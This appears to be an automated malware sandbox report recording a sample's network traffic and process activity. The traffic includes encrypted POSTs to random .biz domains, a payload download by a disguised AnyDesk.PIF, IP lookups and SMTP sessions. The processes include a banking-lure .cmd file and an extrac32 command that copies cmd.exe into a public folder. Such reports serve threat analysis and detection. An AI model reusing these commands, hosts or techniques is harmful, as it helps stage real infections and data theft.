                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port
142         192.168.2.10  50121        13.251.16.150   80

Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:59:43.128339052 CET  351  OUT  POST /dgyuecpahg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:43.128350973 CET  834  OUT  Data Raw: 79 e2 3d 95 c5 3b b7 e0 36 03 00 00 9f 6b 42 9d 1a ea 0c 9d b8 94 a9 0e 82 95 7c d7 e2 b4 a9 ec 91 e0 45 66 99 00 07 e1 84 b0 6d e4 69 5d b6 d5 5f d4 90 06 1b 47 29 34 98 14 fc d5 03 30 56 eb 6b 1b e1 5a f5 33 ab 48 3e 3e 3c 11 20 4d ec 3b 40 13
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: y=;6kB|Efmi]_G)40VkZ3H>>< M;@GU-u\&1-lnG:K+1P7@E}1Y umj];Ijt>r^2f&_Bxk)THz]|eIo'j`kdrFN-+bn~
Nov 18, 2024 09:59:44.570369959 CET  413  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8135aa58e9d56fa4ec0ee44161e50f3b|155.94.241.187|1731920384|1731920384|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
143         192.168.2.10  50122        18.141.10.107   80                7888  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:59:43.197602034 CET  356  OUT  POST /wpvwjnrkggb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:43.197626114 CET  778  OUT  Data Raw: 1f 77 f5 de 27 b1 94 54 fe 02 00 00 03 bb a9 70 9e 32 04 41 87 c3 1a 8b a2 78 42 9d 8c 8e c1 00 e6 67 34 17 93 2f 60 ee e5 8e b7 b9 b1 b0 4d 36 18 85 c3 22 c0 77 7d 93 ab c8 44 0d 1b b6 0c f8 26 02 7f 90 d1 16 22 c3 a6 f0 64 7d d7 8a ce 06 6f 10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: w'Tp2AxBg4/`M6"w}D&"d}o:+!pwQ*&Q'Dr.I<J~3jY`Ym;MJldkaZ./SxD?rot2<={)D%H,2qxaCPb:[8Xa$| .L)
Nov 18, 2024 09:59:45.088054895 CET  417  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=543e0d2e0c6e76ebd88d36e624201a4d|155.94.241.187|1731920384|1731920384|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port
144         192.168.2.10  50123        18.208.156.248  80

Timestamp  Bytes transferred  Direction  Data
Nov 18, 2024 09:59:44.681026936 CET  351  OUT  POST /xgyfws HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:44.681081057 CET | 834 | OUT | Data Raw: 65 f5 99 65 cb 6b 87 ec 36 03 00 00 8b 70 c4 d3 f8 17 fa 28 f7 b0 e7 ee 6a 86 be 0b 01 c1 6c 1d 6f fc 9b 82 c5 42 13 c3 a5 78 25 85 97 7d fc 76 4d c2 91 d3 4e b1 97 e3 9e 7a 4e 05 ba d8 8d 63 10 5e 05 d1 32 77 fd f5 7c 6d d1 a7 c2 73 d8 10 fe af
Data Ascii: eek6p(jloBx%}vMNzNc^2w|ms8L|)-f0Uru/((?^,Kn@[W/t~00\#`9Zn$yIG$zUH{Vrz3l(_'64>OPf9
Nov 18, 2024 09:59:45.357831955 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7dcda1f8c954fe9c322260fb2ade480c|155.94.241.187|1731920385|1731920385|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
145 | 192.168.2.10 | 50124 | 18.246.231.120 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:45.375941038 CET | 354 | OUT | POST /jgtblooqbwhrf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:45.375955105 CET | 834 | OUT | Data Raw: 2c 4d 8f 8d 36 81 3d df 36 03 00 00 e8 4d ae ab 84 5e 19 34 8a 44 7d a6 33 a4 b1 5d f0 14 54 0c bc e3 1e b1 fe 0c a7 65 62 86 17 94 df 15 60 6c 01 ba 17 4f 23 1e 79 69 60 b0 03 8c ea 88 af 9d 86 da 22 db 8e 9d 23 ab 7c 5a 22 93 95 d6 17 ce 7f b0
Data Ascii: ,M6=6M^4D}3]Teb`lO#yi`"#|Z"Qp*;{}|yj~f^L0\b]09CE::yN-MA)b~a4Oo]zRWE8Wj&Sa8|Xp+_+]QSiQwtYp7,e
Nov 18, 2024 09:59:46.215121984 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=56b5c9a597a31de6c06623e8d18cdb32|155.94.241.187|1731920386|1731920386|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.10 | 50125 | 18.208.156.248 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:45.543137074 CET | 356 | OUT | POST /gneaufgitjsgivk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xyrgy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:45.543159008 CET | 778 | OUT | Data Raw: 4e fa 5c 75 1e 34 ee 41 fe 02 00 00 25 b8 a5 50 4c 7c 5c 2d 07 38 c1 d6 9d ec f9 86 9c 26 29 b1 1a 91 36 4e cf 5b 36 59 06 9b 4e 41 9c dc 72 a1 7b 2a c2 56 f6 04 b9 dd 2f d0 f6 dc 20 02 c2 a1 13 67 47 c6 24 e2 57 74 84 c3 22 c4 3c db 2a 10 82 32
Data Ascii: N\u4A%PL|\-8&)6N[6YNAr{*V/ gG$Wt"<*2%0g#lks2] EoyuK@\%{CWt~uvnyyRfOe54U2y13wJdK]ZgT)8f9|YFan
Nov 18, 2024 09:59:46.237864971 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=50adf83ebe8713b37f1f42a1994d4303|155.94.241.187|1731920386|1731920386|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
147 | 192.168.2.10 | 50126 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:46.236325979 CET | 346 | OUT | POST /of HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:46.236341000 CET | 834 | OUT | Data Raw: 21 3e 3a 3f 71 86 f9 7e 36 03 00 00 d0 b1 3a a3 13 1e 27 c7 f6 28 f1 cd 22 6b 72 92 84 99 1c 56 39 7d 6c 46 c0 5f 31 ca 5c 2c 90 52 b7 ba ae 97 40 7c 7e 62 cc 3e 86 27 ef 92 4d 3f 21 dd 0e 12 e1 93 17 a6 1d a3 88 19 36 5b 36 d4 22 95 96 fc 0b f8
Data Ascii: !>:?q~6:'("krV9}lF_1\,R@|~b>'M?!6[6"M"$[HxsZ>%ciz7px}'oEtX;<&<Msn\${Hl[Vhi2<A={q%"TeZ 8i`goqF1\(PIX?
Nov 18, 2024 09:59:46.900810003 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8374ce7067f6c900d42a4a37206140e7|155.94.241.187|1731920386|1731920386|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.10 | 50127 | 172.234.222.143 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:46.352996111 CET | 361 | OUT | POST /qccuqoixlchlyacl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:46.353030920 CET | 778 | OUT | Data Raw: ad 91 0f 47 f3 a3 64 de fe 02 00 00 c3 ce d1 f1 3b fb b0 be cf c9 c1 23 1e c7 de c6 98 2e 04 ea f7 4c fd b3 e7 94 7f 04 9b 13 45 e8 36 81 a0 9b e6 87 40 07 18 2a 55 5a 28 26 c0 78 92 73 ef 2d c6 c0 9b 32 6e 35 4c 58 d6 22 95 08 fc fe bb 06 37 9a
Data Ascii: Gd;#.LE6@*UZ(&xs-2n5LX"7nQ5=t'3be]x\KUVp ^KHRL^mA5.>_;MQ,lf>la4$pX9Vx8;btxjOS?^vy1


Session ID | Source IP | Source Port | Destination IP | Destination Port
149 | 192.168.2.10 | 50128 | 54.244.188.177 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:47.019118071 CET | 345 | OUT | POST /qwi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:47.019162893 CET | 834 | OUT | Data Raw: b2 b7 ab 3d ec 9d 7b 7e 36 03 00 00 96 fd c1 41 ac ee 28 cd 8b 29 43 a2 a4 27 80 b5 24 0f a5 25 2a fb ce d7 40 3c 83 df c2 6a 04 8a dd 4a 37 26 a5 f6 ea 5a 12 0a 5c b2 92 28 0a 42 0e cb 4f d2 1d 41 e6 61 aa 7d 65 15 ab 6a d9 98 b4 88 fc 5d 31 fd
Data Ascii: ={~6A()C'$%*@<jJ7&Z\(BOAa}ej]19:P?!d(uw.<0x,`A3lm1Sw-Myz?QNDwz|:S_0$lX?3;x[~"a~bJpA\[
Nov 18, 2024 09:59:47.826131105 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9cd1f75db5fd0e59a999da8fbbb2f217|155.94.241.187|1731920387|1731920387|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49731 | 198.252.105.91 | 443 | 8060 | C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:57:17 UTC | 162 | OUT | GET /yak2/233_Juqmtmyadyy HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: gxe0.com
2024-11-18 08:57:17 UTC | 365 | IN | HTTP/1.1 200 OK
Connection: close
last-modified: Thu, 14 Nov 2024 22:46:27 GMT
accept-ranges: bytes
content-length: 3182288
date: Mon, 18 Nov 2024 08:57:17 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49824 | 104.26.13.205 | 443 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:57:34 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-18 08:57:34 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 08:57:34 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8e46c0f4ab696be3-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=2253696&cwnd=250&unsent_bytes=0&cid=8536b3248482d984&ts=567&x=0"
2024-11-18 08:57:34 UTC | 14 | IN | Data Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
Data Ascii: 155.94.241.187


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49940 | 104.26.13.205 | 443 | 3996 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:57:54 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-18 08:57:55 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 08:57:54 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8e46c17659e246de-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1811&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1537971&cwnd=251&unsent_bytes=0&cid=f7c32237b9eec937&ts=232&x=0"
2024-11-18 08:57:55 UTC | 14 | IN | Data Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 155.94.241.187


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.10 | 49953 | 104.26.13.205 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:57:57 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-18 08:57:57 UTC | 398 | IN | HTTP/1.1 200 OK
    Date: Mon, 18 Nov 2024 08:57:57 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: close
    Vary: Origin
    cf-cache-status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8e46c1877df16b50-DFW
    server-timing: cfL4;desc="?proto=TCP&rtt=961&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=2949083&cwnd=251&unsent_bytes=0&cid=f5cc3ea58f62075c&ts=218&x=0"
2024-11-18 08:57:57 UTC | 14 | IN | Data Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
    Data Ascii: 155.94.241.187


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 18, 2024 09:57:39.239582062 CET | 587 | 49859 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:39 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 18, 2024 09:57:39.277879953 CET | 49859 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 910646
Nov 18, 2024 09:57:39.518970013 CET | 587 | 49859 | 51.195.88.199 | 192.168.2.10 | 250-s82.gocheapweb.com Hello 910646 [155.94.241.187]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 18, 2024 09:57:39.524532080 CET | 49859 | 587 | 192.168.2.10 | 51.195.88.199 | STARTTLS
Nov 18, 2024 09:57:39.770153999 CET | 587 | 49859 | 51.195.88.199 | 192.168.2.10 | 220 TLS go ahead
Nov 18, 2024 09:57:44.148226023 CET | 587 | 49884 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:44 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 18, 2024 09:57:44.148412943 CET | 49884 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 910646
Nov 18, 2024 09:57:44.390292883 CET | 587 | 49884 | 51.195.88.199 | 192.168.2.10 | 250-s82.gocheapweb.com Hello 910646 [155.94.241.187]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 18, 2024 09:57:44.390511036 CET | 49884 | 587 | 192.168.2.10 | 51.195.88.199 | STARTTLS
Nov 18, 2024 09:57:44.632435083 CET | 587 | 49884 | 51.195.88.199 | 192.168.2.10 | 220 TLS go ahead
Nov 18, 2024 09:57:59.298537970 CET | 587 | 49961 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:59 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 18, 2024 09:57:59.304847956 CET | 49961 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 910646
Nov 18, 2024 09:57:59.545109034 CET | 587 | 49961 | 51.195.88.199 | 192.168.2.10 | 250-s82.gocheapweb.com Hello 910646 [155.94.241.187]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 18, 2024 09:57:59.545281887 CET | 49961 | 587 | 192.168.2.10 | 51.195.88.199 | STARTTLS
Nov 18, 2024 09:57:59.786170006 CET | 587 | 49961 | 51.195.88.199 | 192.168.2.10 | 220 TLS go ahead
Nov 18, 2024 09:58:03.455595016 CET | 587 | 49984 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:58:03 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 18, 2024 09:58:03.455899954 CET | 49984 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 910646
Nov 18, 2024 09:58:03.699121952 CET | 587 | 49984 | 51.195.88.199 | 192.168.2.10 | 250-s82.gocheapweb.com Hello 910646 [155.94.241.187]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.699523926 CET49984587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.943224907 CET5874998451.195.88.199192.168.2.10220 TLS go ahead


                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:08
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff62a990000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:09
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:09
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7ada70000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:35'328 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:09
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
